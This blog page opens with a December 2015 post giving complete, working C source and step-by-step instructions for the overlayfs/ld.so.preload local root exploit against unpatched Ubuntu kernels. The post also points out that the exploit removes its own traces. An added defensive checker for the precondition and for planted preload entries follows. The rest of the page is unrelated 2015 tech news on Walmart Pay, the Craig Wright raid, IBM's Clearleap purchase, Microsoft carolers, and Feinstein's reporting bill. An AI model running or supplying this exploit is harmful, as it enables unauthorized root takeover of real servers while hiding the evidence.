Friday, December 11, 2015
I will show you how an attacker with an ordinary user account gains root on a Linux server. The exploit below still works at the time of writing on hosts whose kernel has not received the overlayfs fix.

How it works: on these kernels an unprivileged user can mount overlayfs from inside a user namespace, and overlayfs did not check that the mounter was allowed to write to the upperdir. When a file in the merged view is modified, the kernel itself copies it up into the upperdir, keeping the file's original owner. The program abuses this twice. The first mount uses a directory full of root-owned files (/proc/sys/kernel, or /sys/kernel/security/apparmor on newer kernels) as lowerdir and a scratch directory as upperdir; renaming one of those files to ld.so.preload makes a root-owned copy land in the scratch directory. The second mount uses the scratch directory as lowerdir and /etc as upperdir; a chmod() on the merged file copies it up into /etc as a world-writable /etc/ld.so.preload. From then on it is plain library preloading: the dynamic loader honours /etc/ld.so.preload for every dynamically linked program, setuid ones included, so a shared object that overrides getuid() gets loaded into /bin/su, notices it is running as root, deletes the preload file and itself, and execs an interactive root shell.

First step: create a C file named privilege_escalation.c and put this code in it:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/wait.h>

/* Source of the shared object that /etc/ld.so.preload will inject into every
 * dynamically linked program. Its getuid() replacement does nothing until it is
 * running as root inside /bin/su; then it removes the preload file and the
 * library (so the system is left clean) and execs an interactive root shell. */
#define LIB \
"#define _GNU_SOURCE\n" \
"#include <dlfcn.h>\n" \
"#include <string.h>\n" \
"#include <unistd.h>\n" \
"#include <sys/types.h>\n" \
"\n" \
"uid_t (*_real_getuid)(void);\n" \
"char path[128];\n" \
"\n" \
"uid_t getuid(void)\n" \
"{\n" \
"    _real_getuid = (uid_t (*)(void)) dlsym(RTLD_NEXT, \"getuid\");\n" \
"    readlink(\"/proc/self/exe\", path, sizeof(path) - 1);\n" \
"    if (geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\n" \
"        unlink(\"/etc/ld.so.preload\");\n" \
"        unlink(\"/tmp/ofs-lib.so\");\n" \
"        setresuid(0, 0, 0);\n" \
"        setresgid(0, 0, 0);\n" \
"        execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n" \
"    }\n" \
"    return _real_getuid();\n" \
"}\n"

static char child_stack[1024*1024];

/* Runs inside the new mount namespace. Two overlay mounts are needed: the
 * first turns a root-owned file into a file named ld.so.preload inside a
 * scratch upperdir; the second uses that scratch directory as lowerdir and
 * /etc as upperdir, so the chmod() copies ld.so.preload up into /etc. The
 * kernel performs both copy-ups without checking that the user may write
 * to the upperdir, which is the bug. */
static int
child_exec(void *stuff)
{
    char *file;
    (void)stuff;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper", 0777);
    mkdir("/tmp/ns_sploit/o", 0777);
    fprintf(stderr, "mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL,
              "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        /* Newer kernels call the filesystem "overlay", require workdir=, and
         * refuse /proc as a lowerdir, so fall back to a root-owned file in /sys. */
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL,
                  "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work", 0777);
    } else
        file = "ns_last_pid";
    chdir("/tmp/ns_sploit/o");
    rename(file, "ld.so.preload");   /* copy-up: upper/ now holds a root-owned ld.so.preload */
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr, "mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL,
              "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL,
                  "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work", 0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload", 0777);   /* copy-up into /etc, world-writable */
    umount("/tmp/ns_sploit/o");
    return 0;
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    (void)argc;
    (void)argv;

    fprintf(stderr, "spawning threads\n");
    if ((wrapper = fork()) == 0) {
        /* A new user namespace gives this unprivileged process CAP_SYS_ADMIN
         * inside the namespace, which is what the mount() calls need. */
        if (unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
        if ((init = fork()) == 0) {
            /* ... and a new mount namespace to perform the overlay mounts in. */
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if (pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
            exit(0);
        }
        waitpid(init, &status, 0);
        return 0;
    }
    usleep(300000);
    wait(NULL);
    fprintf(stderr, "child threads done\n");

    /* If both mounts worked, /etc/ld.so.preload now exists with mode 0777. */
    fd = open("/etc/ld.so.preload", O_WRONLY);
    if (fd == -1) {
        fprintf(stderr, "exploit failed\n");
        exit(-1);
    }
    fprintf(stderr, "/etc/ld.so.preload created\n");
    fprintf(stderr, "creating shared library\n");
    lib = open("/tmp/ofs-lib.c", O_CREAT | O_WRONLY, 0777);
    write(lib, LIB, strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if (lib != 0) {
        fprintf(stderr, "couldn't create dynamic library\n");
        exit(-1);
    }
    /* Point the loader at our library, remove the scratch files, and run the
     * setuid su: its first getuid() call lands in the hook, which execs the
     * root shell. */
    write(fd, "/tmp/ofs-lib.so\n", 16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su", "su", NULL);
    return 1;
}
Second step: compile the program:

user@ubuntu-server-1504:~$ gcc privilege_escalation.c -o privilege_escalation

This produces an executable called privilege_escalation. Note that gcc must also be present when the exploit runs: the program invokes it a second time to build the preload library /tmp/ofs-lib.so.

Final step: run the exploit to get a root shell:

user@ubuntu-server-1504:~$ ./privilege_escalation

The program reports its progress on stderr ("mount #1", "mount #2", "/etc/ld.so.preload created", ...) and then execs /bin/su, whose first getuid() call hands you an interactive root shell. If neither mount attempt succeeds it prints "no FS_USERNS_MOUNT for overlayfs on this kernel" and exits: the kernel either does not let unprivileged users create user namespaces or does not allow overlayfs to be mounted inside one. On a host that has the kernel fix for this bug, expect "exploit failed" or one of the mount errors instead of a shell. A successful run leaves few traces: the program deletes /tmp/ns_sploit and /tmp/ofs-lib.c before calling su, and the payload unlinks /etc/ld.so.preload and /tmp/ofs-lib.so the moment it fires, so those files exist only while the attack is in progress.

This exploit works on Ubuntu 12.04, 14.04, 14.10 and 15.04 with their stock kernels; Ubuntu shipped a kernel update for the bug in mid-2015, so an updated host is not affected.
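Before running this against a host you administer, it helps to know whether the kernel still exposes the precondition the exploit depends on, and whether someone has already planted an /etc/ld.so.preload. The program below is an added example written for this page, not part of the original post or of the exploit. It repeats the exploit's namespace setup (an unprivileged user namespace, plus the uid map that `unshare -Ur` writes, then a mount namespace) and tries an overlay mount whose lower, upper and work directories all belong to the caller, so it is harmless; it also scans ld.so.preload for entries outside the system library directories, which is where the exploit's /tmp/ofs-lib.so would appear. The scratch path /tmp/ofs_check.XXXXXX, the file name ofs_check.c and the list of trusted library prefixes are assumptions of this example.

```c
/* Added check, not from the original post: is the exploit's overlay mount still allowed, and is ld.so.preload planted? */
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

enum { PROBE_ALLOWED, PROBE_ERROR, PROBE_NO_NAMESPACE, PROBE_NO_OVERLAY };

/* As an unprivileged user, enter fresh user + mount namespaces (the exploit's
 * setup, plus the uid map `unshare -Ur` writes) and mount an overlay whose
 * lower/upper/work dirs the caller owns. PROBE_ALLOWED means the kernel still
 * permits what the exploit relies on. Only a scratch directory under /tmp (an
 * assumed location) is touched, so the probe itself is harmless. */
int probe_unpriv_overlay_mount(void)
{
    const char *name[4] = { "lower", "upper", "work", "merged" };
    char base[] = "/tmp/ofs_check.XXXXXX", dir[4][96], opts[320], map[32];
    uid_t uid = getuid();
    pid_t pid;
    int i, fd, status;

    if (mkdtemp(base) == NULL)
        return PROBE_ERROR;
    for (i = 0; i < 4; i++) {
        snprintf(dir[i], sizeof dir[i], "%s/%s", base, name[i]);
        if (mkdir(dir[i], 0700) != 0)
            return PROBE_ERROR;
    }
    snprintf(opts, sizeof opts, "lowerdir=%s,upperdir=%s,workdir=%s", dir[0], dir[1], dir[2]);
    if ((pid = fork()) < 0)
        return PROBE_ERROR;
    if (pid == 0) {
        if (unshare(CLONE_NEWUSER) != 0)
            _exit(PROBE_NO_NAMESPACE);
        snprintf(map, sizeof map, "0 %u 1", (unsigned)uid);   /* caller becomes uid 0 inside */
        if ((fd = open("/proc/self/uid_map", O_WRONLY)) < 0 || write(fd, map, strlen(map)) < 0)
            _exit(PROBE_NO_NAMESPACE);
        close(fd);
        /* private propagation so a successful mount cannot leak back to the host */
        if (unshare(CLONE_NEWNS) != 0 || mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL) != 0)
            _exit(PROBE_NO_NAMESPACE);
        if (mount("overlay", dir[3], "overlay", 0, opts) != 0) {
            strcat(opts, ",userxattr");    /* option newer kernels offer for unprivileged mounts */
            if (mount("overlay", dir[3], "overlay", 0, opts) != 0)
                _exit(PROBE_NO_OVERLAY);
        }
        umount(dir[3]);
        _exit(PROBE_ALLOWED);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        status = PROBE_ERROR;
    else
        status = WEXITSTATUS(status);
    for (i = 3; i >= 0; i--)
        rmdir(dir[i]);
    rmdir(base);
    return status;
}

/* /etc/ld.so.preload is a whitespace-separated list of shared objects that ld.so
 * loads into every dynamically linked program, setuid ones included. Count the
 * entries outside the system library dirs (the exploit's is /tmp/ofs-lib.so);
 * a "/../" inside a path would defeat the prefix check, so those count too. */
int count_untrusted_preload_entries(const char *contents)
{
    static const char *const ok[] = { "/lib/", "/lib64/", "/lib32/", "/usr/lib/", "/usr/lib64/", "/usr/lib32/" };
    char *copy = strdup(contents), *tok, *save;
    int bad = 0;
    size_t i;

    if (copy == NULL)
        return -1;
    for (tok = strtok_r(copy, " \t\r\n", &save); tok; tok = strtok_r(NULL, " \t\r\n", &save)) {
        for (i = 0; i < sizeof ok / sizeof ok[0]; i++)
            if (strncmp(tok, ok[i], strlen(ok[i])) == 0 && strstr(tok, "/../") == NULL)
                break;
        bad += i == sizeof ok / sizeof ok[0];
    }
    free(copy);
    return bad;
}

int main(void)
{
    char buf[4096] = "";
    FILE *f = fopen("/etc/ld.so.preload", "r");
    if (f) { buf[fread(buf, 1, sizeof buf - 1, f)] = '\0'; fclose(f); }
    printf("overlay probe: %d (0 allowed, 1 probe error, 2 namespace refused, 3 overlay refused)\n",
           probe_unpriv_overlay_mount());
    printf("/etc/ld.so.preload: %s, %d entries outside system library dirs\n",
           f ? "present" : "absent", count_untrusted_preload_entries(buf));
    return 0;
}
```

Build it with gcc -Wall -o ofs_check ofs_check.c and run it as a normal user. A probe result of 0 means an unprivileged user can mount overlayfs inside a user namespace, so the exploit's first mount would succeed; whether the copy-up into /etc also succeeds depends on the kernel fix, which this probe does not exercise. Every path listed in /etc/ld.so.preload is loaded into every dynamically linked program on the box, so even one entry outside /lib or /usr/lib deserves an immediate look, and on most systems the file should simply not exist.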


12:29 PM

Thursday, December 10, 2015
Walmart Jumps Into Mobile Pay Fray

Walmart on Thursday introduced its own mobile payments solution to let customers make in-store purchases with an Android or iOS smartphone. The move will make it the only retailer to compete with third-party mobile payment systems.

Walmart currently is rolling out the feature through its Walmart mobile app in select stores in the northwest Arkansas area. It will expand to stores across the country by the first half of 2016, according to company spokesperson Danit Marquardt.

"The goal of Walmart Pay is simple," she told the E-Commerce Times. "Improve the checkout experience at Walmart stores and expand mobile payment access for millions of Americans."

The company sees Walmart Pay as complementary to other third-party mobile pay apps, and it is evaluating several mobile wallets that may be integrated into the Walmart Pay ecosystem in the future, Marquardt said.

Walmart Pay is designed to work with any major credit, debit, prepaid or Walmart gift card. It will allow customers to automate several functions, such as picking up of merchandise ordered online, refilling prescriptions at Walmart pharmacies, or finding a store location to purchase a particular item.

Twenty-two million people currently use the Walmart app each month, the company said, and it ranks among the top three retail apps on Google Play and the iTunes App Store.

Walmart never has offered Apple Pay or Android Pay at its stores, Marquardt confirmed.

Keeping Customer Data, Transaction Fees

One of the key reasons Walmart would choose to go in this direction could be to develop direct relationships with its customers rather than allowing third parties like Apple and Google to operate as intermediaries, observed Charles King, principal analyst at Pund-IT.

"This is something large-scale retailers and other companies have done for years, as evidenced by branded credit cards and gift cards," he told the E-Commerce Times.

It's too early to determine how well Walmart will do, as mobile payments are a small percentage of overall retail purchases, King noted. They reached about US$3.5 billion in 2014, and have been growing at a slower pace than expected.

A customer can make a Walmart Pay transaction at any register in the store by opening the Walmart app, choosing Walmart Pay, activating the camera, and then scanning the code displayed at the register. The Walmart associate then scans and bags the items being purchased. The system sends an e-receipt directly to the app.

Walmart has no plans to offer special discounts exclusively to Walmart Pay users, Marquardt said.

One of Walmart's key goals likely is to reduce the fees it pays for third-party charge card transactions, suggested Kevin Krewell, principal analyst at Tirias Research.

"When you are the scale of Walmart, a few percentage [points] of the purchases adds up to a lot of money," he told the E-Commerce Times.

Walmart belongs to the MCX Consortium, which is promoting a mobile payment system called "CurrentC," Krewell noted. CurrentC aims to compete directly with Apple Pay, but it has been delayed until 2016.

CVS and Rite Aid, two pharmacy chains that are part of the MCX Consortium, turned off the Apple Pay system at their stores last fall.

Right after that decision, a team of antitrust lawyers at Schubert, Jonckheer & Kolbe threatened to go after the chains for possible antitrust violations.

Rite Aid this summer reversed course and announced it would accept Apple Pay, Google Wallet and Android Pay.

Merchant-Owned Platform

CurrentC currently is undergoing beta tests in Columbus, Ohio, according to MCX, and Walmart is one of 40 merchant partners planning a national launch.

"Walmart continues to be a strong and supportive partner of MCX and CurrentC -- and our goals remain the same -- to offer customers choices and convenience at checkout," MCX said in a statement provided to the E-Commerce Times by spokesperson Jonathan Lowe.

It remains to be seen whether the millions of Walmart customers who don't have credit or debit cards -- or in some cases, checking accounts -- will embrace the mobile app.

"There's a certain percentage of their customers who don't have cards of any type -- they're essentially bankless people," RSR Research analyst Brian Kilcourse told the E-Commerce Times.

It is not yet clear if those customers will be able to load cash directly onto the mobile app.

David Jones is a freelance writer based in Essex County, New Jersey. He has written for Reuters, Bloomberg, Crain's New York Business and The New York Times.

3:20 AM

Wednesday, December 9, 2015

Australian police on Wednesday afternoon raided the home of a shadowy figure who just hours earlier had been outed as one of the original founders of bitcoin digital currency in two separate media reports.

Identified in multiple media reports, Australian entrepreneur Craig Steven Wright was said to be the man who for years had been known as "Satoshi Nakamoto" -- widely considered the creator of the controversial bitcoin cryptocurrency.

The Australian Federal Police "conducted search warrants to assist the Australian Taxation Office at a residence in Gordon, NSW, and a business premises in Ryde, Sydney," a spokesperson confirmed in a statement provided to the E-Commerce Times.

The Taxation Office, which is the equivalent of the Internal Revenue Service in the U.S., could not comment on the taxation affairs of an individual or entity, citing confidentiality provisions in the Tax Administration Act, according to a spokesperson.

Wright's Links to Nakamoto Identity

The raid came just hours after Gizmodo and Wired each published investigative stories claiming to uncover the true identities of the bitcoin founder.

However, the raids were not conducted as the result of any such reports, police officials said.

"Satoshi Nakamoto" was the nom de guerre of two bitcoin innovators -- Wright and U.S. computer forensics expert David Kleiman, who died in 2013, Gizmodo reported.

Wright was the chief executive officer of DeMorgan, which in 2014 announced plans to open the world's first bitcoin-based bank, called "Denariuz Bank," according to a report in Business Insider Australia.

A cache of leaked emails, transcripts and accounting forms that link Wright to Nakamoto formed the basis of Wired's report.

The documents include correspondence between Wright and Kleiman, as well as documents dating back to 2008 that, for example, reference Wright discussing a "P2P distributed ledger" that was a record of transactions that we now know as a "blockchain." There's also a 2009 blogpost, which since has been deleted, that references Wright's plan to launch bitcoin, according to Wired.

A group of redacted documents obtained by the E-Commerce Times appear to show a meeting from February 2014 involving tax officials and Wright discussing his companies, including Hotwire Preemptive Intelligence, Coin Exch Pty., Cloudcroft and other entities. The documents reference a legal advisor, Andrew Sommer, who is referenced in several reports as an attorney for Wright.

Wright's biography describes him as a former executive vice president of strategic development at the UK Centre for Strategic Cyberspace and Security Science.

Kleiman Link

Kleiman was a U.S. Army veteran from Palm Beach County, Fla., who was confined to a wheelchair following a motorcycle accident in 1995, and died in squalor with a loaded handgun and empty alcohol bottles surrounding his body, the Gizmodo report claims.

However, Kleiman had a bitcoin currency trust worth hundreds of millions of dollars, the report also claims.

The reports may not quite pass the smell test, however.

"My conclusion is that it's way too early to point to Mr Wright as the inventor of bitcoin," said Kevin Krewell, principal analyst at Tirias Research.

Even if Wright turns out to be the genuine article, the future development of the bitcoin business will not be harmed in a way that halts or reverses its growth, he said.

"The system is decentralized and can continue without its founder," Krewell told the E-Commerce Times.

"Bitcoin is not unlike Linux, where the code is contributed to by many people around the globe, but unlike Linux, the founder/inventor Satoshi Nakamoto has not taken a visible role in the technology's future," he pointed out.

As to whether Wright and Nakamoto are one and the same, "I think there are a lot of questions," said William Norton, an associate at Baker Donelson.

"The bitcoin community that I have encountered seems very skeptical. They're naturally a fairly conspiratorial group, but I think there are genuine questions outstanding," he told the E-Commerce Times.

"If we need definitive evidence, there should be a private key on the computers of the founder that would prove his identity," Norton said. "I imagine a good portion of the community will be skeptical until they see that."

Attorney Andrew Sommer, who reportedly represents Wright, was not immediately available to comment for this story.

David Jones is a freelance writer based in Essex County, New Jersey. He has written for Reuters, Bloomberg, Crain's New York Business and The New York Times.

8:10 AM

IBM Leaps Into Video Delivery

IBM on Tuesday revealed that it has acquired Clearleap, a company that develops cloud middleware for streaming video between endpoints.

Clearleap's scalable video platform can support millions of concurrent users in the event live broadcasting is in high demand. Customers of the company, which recently raised $40 million in funding, include the NFL, Time Warner Cable, Verizon and HBO.

IBM intends to integrate Clearleap's video platform into the IBM Cloud for enterprises looking to manage, monetize and expand user video experiences and deliver them securely via the Web and mobile devices.

The acquisition is part of IBM's broader strategy for its Platform as a Service offering. Clearleap will add a new facet to that strategy: Web video.

The acquisition has the potential to create "huge, discrete business opportunities for online video," said Charles King, principal analyst for Pund-IT.

"While I expect Clearleap to continue serving and pursuing entertainment companies, like its existing clients -- HBO, Verizon, TWC and so on -- the deal clearly reflects IBM's belief that video will grow in importance among the company's enterprise customers and eventually become common in business content/communications," he told the E-Commerce Times.

The deal may appear mundane, but it will be interesting to watch how it progresses, said brand consultant Evan Carmichael.

IBM "has had 14 consecutive falls in quarterly revenue," he told the E-Commerce Times.

"They're shifting from hardware to cloud computing, and since they are forced to buy their way in since they haven't kept up on the R&D side to stay relevant, they're up against established players like Oracle and Microsoft as well as Internet-based businesses like Salesforce.com and Amazon.com," Carmichael said.

IBM declined to disclose financial details of the deal.

Head in the Clouds

As its hardware business rusts, IBM has been stepping up efforts to pivot to the cloud and establish itself as a heavyweight in the sector. While it has focused on cloud storage in all the popular flavors, as well as development, the company also has been laying the framework for Web video.

It acquired Aspera in 2013 to boost large data transfers, and this year announced it was buying Cleversafe for its object-based storage. Both of those platforms will be used to support Clearleap's platform.

IBM has its toes and fingers in a range of high-tech sectors, noted Tirias Research Principal Analyst Paul Teich, who once worked with video compression technologies.

It might have been a bad use of time and money for IBM to try to build out a video delivery service from base ingredients, he told the E-Commerce Times.

"I wouldn't call it the final days of print, but we're certainly moving to a more postliterate society," Teich said. "People want to communicate directly with one another in real time, using natural communication methods, with video being one of them. So I see this as a move on IBM's part to catch up."

IBM has been playing catch-up because other cloud players are so far ahead. However, the growing strength of IBM's cloud has pushed the company into a good position, and other power players, such as Amazon Web Services, are far from invincible, according to Pund-IT's King.

"That's especially the case if you take into account the problems AWS has had with its own service, like the database glitch in September that halted Netflix's and Amazon's video services," he said.

Video on Demand, in Demand

Video has become increasingly important, and quality matters a great deal, according to Teich. People care about color accuracy, compression artifacts and a stable frame rate.

"People are visual creatures," he said. "When you look at how much we understand through our eyes and how quickly we understand it, it's perhaps the dominant sense that we have in terms of sensing the world around us and interacting with other people."

It isn't easy to deliver the "high bandwidth our eyes want to see," Teich said. These days, people want Web delivery of content to their mobile devices -- "cloud first, mobile first," as Microsoft once phrased it.

Purchasing Clearleap "is a good catch-up move," he said. "Certainly it's not too late for anything."

Quinten Plummer is a longtime technology reporter and an avid PC gamer who explored local news for a few years, covering law enforcement and government beats, before returning to writing about things run by ones and zeros and the people who make them. If it pushes pixels or improves lives, he wants to learn all he can about it.

6:34 AM

Microsoft and Apple Share a Peaceful Moment

Can you imagine Microsoft and Apple actually liking each other? Who'da thunk such a thing was even possible? However, the holiday spirit is alive and well at Microsoft. The company flew a bunch of workers from around the country into New York City for something very special.

Microsoft workers and a local NYC children's youth choir met at Microsoft's new Fifth Avenue store to spread some special holiday cheer. Their goal was to share a message of peace and harmony with Microsoft's neighbor down the street... Apple.

The Microsoft employees and the youth choir broke into song as they walked from their Fifth Avenue location to the iconic Apple store near Central Park -- you know, that big, clear, square block with the giant Apple logo on the side.

What happened next was very inspiring. The carolers brought the Apple workers out of the store, and they all enjoyed a touching moment with many other New Yorkers watching, but not believing what they were seeing.

Could this be the beginning of a new era of peace and prosperity between these two tech giants? Perhaps. If nothing else, this is a great first step. Microsoft is saying "let there be peace." Not bad.

We don't yet know how Apple will respond, but I would expect to see chapter two coming soon.

Reagan and Gorbachev

Not so long ago, Russia was the big, bad enemy of the U.S. Then President Ronald Reagan and Mikhail Gorbachev really shook things up. They became friendly, and the resistance softened. Reagan's policy of "trust, but verify" was necessary, due to the longstanding feud.

Things were quite nice for a while. After a few decades, though, the walls went back up, and we are now back to where we started.

New Microsoft CEO Satya Nadella must have given the go-ahead for the New York City gesture. That is a good sign. He seems to have a fresh new understanding of the marketplace and his role at this time in history. He seems to understand that people use many different devices, often from competing brands -- yet they want them all to work well together.

So the question is, can Nadella soften the heart of Apple CEO Tim Cook? That's the big question. Let's hope so. These are two new leaders in a new chapter. New thinking should be welcomed by all right now.

We Can Hope for Peace

Perhaps we can enter a new age. Perhaps Microsoft and Apple actually can become less combative. Sure, they will have to live in a world of "trust, but verify" for a long while. However, wouldn't it be a better world if everyone could sit down and have a cup of coffee together once in a while?

Will this appeal for peace go beyond a gesture? Who knows? However, one thing we can enjoy today is how the holiday spirit really seems to be changing things on the tech battlefield. Let's hope it continues to spread.

E-Commerce Times columnist Jeff Kagan is a wireless analyst, telecom analyst, industry analyst, consultant and speaker who has been sharing his colorful perspectives on the changing industry for 25 years. Email him at jeff@jeffKAGAN.com.

6:15 AM

Feinstein Revives Terrorist Activity Reporting Bill

Sen. Dianne Feinstein, D-Calif., on Tuesday reintroduced a bill that would require technology companies to alert law enforcement of certain activities that might be related to terrorist threats.

Cosponsored by Sen. Richard Burr, R-N.C., the Requiring Reporting of Online Terrorist Activity Act would mandate that technology companies notify authorities of communications regarding attack planning, recruitment, or distribution of information relating to explosives if they should become aware of that activity. The bill would not require active monitoring or force them to actively search for such activity.

Feinstein earlier this year failed to attach a similar bill to the Senate Intelligence Authorization Act. However, because the current version is modeled on existing legislation that requires the reporting of online child pornography, it might have a better chance of success.

The Child Porn Connection

Terrorist organizations like ISIL are using social media to reinvent how they recruit and plot attacks, Feinstein said, and the government needs help from technology companies to thwart them.

"This bill doesn't require companies to take any additional actions to discover terrorist activity," Feinstein emphasized. "It merely requires them to report such activity to law enforcement when they come across it. Congress needs to do everything we can to help intelligence and law enforcement agencies identify and prevent terrorist attacks, and this bill is a step in the right direction."

The act is not limited to social media companies; it applies to any operation that provides an "electronic communication service or remote computing service" to the public. That arguably could include libraries, cafes and other places that provide technology services.

The current bill is the same as the one that was approved by the Senate Intelligence Committee in June, which was removed in order to secure passage of the more comprehensive Senate Intelligence Authorization Act.

Sen. Ron Wyden, D-Ore., one of the earlier bill's chief critics, on Tuesday tweeted that he would oppose the reintroduced version, because it would make technology companies reluctant to cooperate.

"I'm opposed to this proposal because I believe it will undermine that collaboration and lead to less reporting of terrorist activity, not more," he said.

FBI Director James Comey earlier this year testified that social media companies were "pretty good at telling us what they see," Wyden noted.

Feinstein reintroduced the bill following last week's mass shooting in San Bernardino. Tashfeen Malik, one of the suspects, reportedly posted her allegiance to ISIS on her Facebook page before the attack.

Facebook deleted the posts, as per policy, according to Feinstein's office.

In another case, British citizen Junaid Hussein, a recruiter and hacker for ISIS, contacted several individuals in the U.S. and UK through multiple Twitter accounts, inciting several attempted attacks prior to his death in a U.S. drone strike earlier this year.

An official familiar with Google's policy, who requested anonymity, said the company supported a strong effort to combat terrorism but "we aren't confident this is the best approach," because the term "terrorist activity" in the legislation is overly broad.

Twitter did not address the Feinstein legislation directly but did confirm that it has teams around the world actively investigating reports of rule violations, and noted that it works with law enforcement entities around the world when appropriate.

Tech, Privacy Advocates Not Having It

The proposed bill will do more harm than good to the privacy rights of ordinary citizens engaged in political speech, according to privacy advocates, who have argued that it would put tech companies in an uncomfortable position and open the process to government abuse.

"This proposal is identical to the one last summer that was roundly criticized by tech companies, Internet advocates and politicians alike before it died a natural death," said Michael McCloud Ball, chief of staff at the ACLU's Washington office.

The bill is so vaguely worded that "innocent social media users" would feel the most impact after being "swept up in an overzealous attempt to comply" with the mandate, he told the E-Commerce Times.

The policy would lead some companies to be overzealous, while others would stick their heads in the sand, warned Emma Llansó, director of the Free Expression Project at the Center for Democracy & Technology.

"Some would decide to significantly over-report their customers' information and private communications to the U.S. government to ensure that the company stays on the right side of the law," she reasoned. "Others would refuse to review any content that was flagged to them, for fear that doing so would mean they obtain the 'actual knowledge of any terrorist activity' that triggers the reporting obligation."

David Jones is a freelance writer based in Essex County, New Jersey. He has written for Reuters, Bloomberg, Crain's New York Business and The New York Times.

3:20 AM

 